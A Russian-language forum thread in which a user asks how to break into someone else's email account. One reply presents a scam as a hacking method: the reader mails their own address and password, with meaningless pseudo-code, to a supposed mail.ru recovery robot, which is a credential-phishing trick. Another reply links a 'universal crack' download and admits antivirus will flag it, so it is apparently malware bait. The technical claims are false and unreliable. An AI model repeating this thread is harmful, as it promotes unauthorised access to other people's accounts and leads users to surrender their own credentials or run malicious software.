Сергей Шеметов

Нужна помощь. kak vzlomat pochtu?

Vasliddin Saitov

это понты не сможеш

Санек Мадягин

Хочеш угадаю? Тебе понадобился пароль от почтового ящика твоего друга или давно надоевшего тебе соседа? Я тебе скажу одно: ты попал по адресу! С помощью этой страницы любой умелый пользователь или даже заядлый чайник сможет узнать (взломать) пароль для любого почтового ящика без особых усилий! Для начала займёмся взломом почтовых ящиков на mail.ru. Взломать, т. е. получить пароль от ящика на mail.ru оказывается можно и не так уж сложно! Как известно, на почтовой службе mail.ru есть служба восстановления пароля. Адрес робота, который принимает заявки на восстановления пароля такой: my.password@mail.ru Когда Вы хотите восстановить пароль, на этот ящик отправляется письмо особого содержания. Все делов том, если Роботу в письме послать ваш e-mail и пароль от своего ящика, а также адрес ящика, пароль которого хотите узнать, то пароль от ящика жертвы приходит… на ваш ящик. Следующий текст нужно скопировать и вставить в письмо и послать на my.password@mail.ru, также главное не забудьте подставить свои данные и e-mail жертвы!

< ? q_repare=
$default-box: "имя_вашего_ящика_полностью";
$default-pass: "пароль_вашего_ящика";
$default-aosp: "ответ_на_секретный_вопрос (любые слова - значения не имеет) ";
?a_repare=
$recovery-box: "адрес_ящика_пароль_которого_хотите_узнать";
$lost-pass: "#take{array["bd_massive $pass_?"]
#lost-pass}";
?>

Андрей

file.qip.*ru/file/b6nt6r3B/mailru.html

вот тебе универсальный кряк. вставляешь e-mail жертвы и через некоторое время тебе высвечивается пароль ящика.

программа естественно может определятся как вирус, что и естественно, это же хакерская утилита.

* надо убрать в адресе